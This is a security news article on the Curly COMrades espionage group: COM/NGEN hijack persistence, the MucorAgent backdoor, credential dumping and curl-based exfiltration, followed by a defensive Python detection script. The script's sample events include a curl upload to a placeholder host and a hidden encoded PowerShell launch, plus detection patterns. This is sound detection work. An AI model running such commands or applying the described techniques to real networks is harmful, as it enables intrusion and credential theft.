Russia-Aligned ‘Curly COMrades’ Hackers Deploy Stealthy COM Hijack to Burrow into Government and Energy Networks

A newly identified cyber-espionage group, dubbed Curly COMrades, has been quietly infiltrating critical government and energy networks in Eastern Europe using a rare persistence trick hidden in plain sight.


Researchers at Bitdefender Labs say the group—believed to operate in alignment with Russian geopolitical interests—has been active since at least mid-2024, targeting judicial and government bodies in Georgia and an energy distributor in Moldova. Their aim: embed themselves deep inside networks for the long haul, harvest credentials, and exfiltrate sensitive data with as little noise as possible.


An Unorthodox Foothold: COM Hijacking Meets NGEN


While most espionage crews lean on tried-and-true persistence methods, Curly COMrades introduced a twist: hijacking Component Object Model (COM) handlers linked to Microsoft’s Native Image Generator (NGEN). This normally dormant .NET optimization service is periodically—and unpredictably—reactivated by Windows, allowing the malware to resurface without triggering conventional startup alarms.


“This is persistence that can survive reboots, updates, and potentially security scans,” said James McQuiggan, Security Awareness Advocate at KnowBe4. “By encrypting their commands and abusing Windows features such as COM objects, attackers are creating persistence that can survive reboots, updates, and potentially security scans.”


The hijack loads a custom backdoor, MucorAgent—a three-stage, AES-encrypted, PowerShell-driven implant capable of executing scripts invisibly, patching AMSI to bypass antivirus inspection, and exfiltrating results disguised as PNG image files via curl.exe.


Infrastructure Disguised as Everyday Web Traffic


Bitdefender’s analysis shows the group relying heavily on proxy tooling—Resocks, SOCKS5 servers, SSH with Stunnel—to build redundant entry points. Many of these connections route through compromised but legitimate websites, masking C2 traffic inside what appears to be ordinary browsing activity.


“The heavy use of curl.exe for C2 traffic and exfiltration demonstrates a living-off-the-land approach,” said Ensar Seker, CISO at SOCRadar. “They’re blending into normal administrative activity, making detection much harder.”


Evidence suggests the group maintains a broad network of hijacked web servers to bounce traffic, further complicating attribution and allowing them to bypass geo-blocking rules.


Credential Harvesting at Scale


Once inside, Curly COMrades show an obsession with credential theft. Investigators observed repeated NTDS database extractions from domain controllers and LSASS memory dumps to recover password hashes or even plaintext credentials. The group rotated through well-known tooling—Mimikatz, procdump, DCSync—as well as custom builds derived from open-source projects like TrickDump.


The overlap in encryption techniques between these tools and MucorAgent suggests shared development resources or at least a common toolkit philosophy.


Low-Noise Data Theft


Exfiltration is sparse and manual—archives are staged in public folders, compressed with WinRAR, and pushed to attacker-controlled infrastructure via curl. That measured pace likely keeps intrusion detection systems from flagging abnormal spikes in outbound data.


According to Seker, the campaign “is not a smash-and-grab operation; it’s patient, persistent espionage” aimed at high-value targets where stealth outweighs speed.


Why the Name?


Bitdefender’s decision to christen the crew Curly COMrades breaks from the industry trend of giving APTs sleek or myth-inspired monikers. The name references both their reliance on curl.exe and their COM object hijacking, but it’s also meant to strip away any mystique.


“They are not ‘fancy bears’ or ‘wizard spiders,’” the researchers wrote. “They are simply malicious actors engaged in disruptive and harmful behavior.”


Defensive Takeaways


Analysts recommend stepped-up behavioral monitoring to detect COM object changes, irregular PowerShell activity, and unexpected curl.exe traffic patterns. Restricting the use of administrative tools and auditing scheduled tasks for inactive or odd-looking entries could surface persistence before it triggers.
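As an added illustration of the monitoring the analysts describe (example code, not Bitdefender's tooling or anything from the report), the following Python runs three defender-side heuristics over constructed Sysmon-style events: a COM server registered under a per-user hive or pointing into a user-writable path, curl.exe launched with an upload flag, and hidden or encoded PowerShell. The key=value log format, the sample CLSIDs, paths and host are assumptions made for the example.

```python
import re

# Constructed sample events in this example's own key=value format, using
# Sysmon-like field names (EventID 13 = registry value set, EventID 1 = process
# create). CLSIDs, paths and hosts are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    'EventID=13 Image=C:\\Windows\\explorer.exe TargetObject=HKU\\S-1-5-21-1\\Software\\Classes\\CLSID\\{00000000-0000-0000-0000-000000000001}\\InprocServer32\\(Default) Details="C:\\Users\\alice\\AppData\\Local\\Temp\\update.dll"',
    'EventID=13 Image=C:\\Windows\\System32\\msiexec.exe TargetObject=HKLM\\Software\\Classes\\CLSID\\{00000000-0000-0000-0000-000000000002}\\InprocServer32\\(Default) Details="C:\\Program Files\\Vendor\\vendor.dll"',
    'EventID=1 Image=C:\\Windows\\System32\\curl.exe ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="curl.exe -s -F file=@C:\\Users\\Public\\report.png https://example.invalid/upload"',
    'EventID=1 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=C:\\Windows\\System32\\svchost.exe CommandLine="powershell.exe -w hidden -enc SQBFAFgA"',
    'EventID=1 Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Windows\\explorer.exe CommandLine="cmd.exe /c dir"',
]

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Registry keys where Windows resolves a COM server: the COM hijack surface.
COM_SERVER_RE = re.compile(r'\\CLSID\\\{[0-9A-Fa-f-]+\}\\(InprocServer32|LocalServer32)', re.I)
# Locations a standard user can write to; a legitimate COM server DLL rarely lives there.
USER_WRITABLE_RE = re.compile(r'\\(Users|ProgramData|Temp|AppData|Public)\\', re.I)
CURL_UPLOAD_RE = re.compile(r'(^|\s)(-F|-T|-d|--data|--upload-file)(\s|=)')
PS_SUSPICIOUS_RE = re.compile(r'\s-(e|ec|enc|encodedcommand|w\s+hidden|windowstyle\s+hidden)\b', re.I)

def parse_event(line):
    """Turn one key=value line into a dict, stripping quotes around values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def classify(ev):
    """Return the detection labels that fire for one parsed event."""
    hits = []
    if ev.get('EventID') == '13' and COM_SERVER_RE.search(ev.get('TargetObject', '')):
        # Per-user hives (HKCU / HKU\<SID>) are consulted before HKLM, so a CLSID
        # server registered there silently overrides the machine-wide one.
        if ev['TargetObject'].upper().startswith(('HKU\\', 'HKCU\\')):
            hits.append('com_server_registered_in_user_hive')
        if USER_WRITABLE_RE.search(ev.get('Details', '')):
            hits.append('com_server_in_user_writable_path')
    if ev.get('EventID') == '1':
        image, cmd = ev.get('Image', '').lower(), ev.get('CommandLine', '')
        if image.endswith('\\curl.exe') and CURL_UPLOAD_RE.search(cmd):
            parent = ev.get('ParentImage', '?').rsplit('\\', 1)[-1].lower()
            hits.append('curl_upload_from_' + parent)  # the driving parent matters
        if image.endswith('\\powershell.exe') and PS_SUSPICIOUS_RE.search(cmd):
            hits.append('powershell_hidden_or_encoded')
    return hits

def scan(lines):
    """Map each flagged line index to its labels; clean lines are omitted."""
    results = ((i, classify(parse_event(line))) for i, line in enumerate(lines))
    return {i: labels for i, labels in results if labels}
```

On the constructed sample, the vendor DLL installed under HKLM by msiexec.exe and the plain cmd.exe launch produce no findings, which is the point: the heuristics key on where the COM server lives and who drives curl.exe, not on the tools themselves.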


McQuiggan warns that waiting for an alert isn’t enough: “Threat hunting is critical for detecting these types of attacks. If organizations are waiting for an alert, they are already losing the battle.”


For governments and critical infrastructure operators, the lesson is stark—Curly COMrades have shown that by creatively combining old techniques with uncommon persistence hooks, a patient adversary can all but disappear into the noise of daily network activity.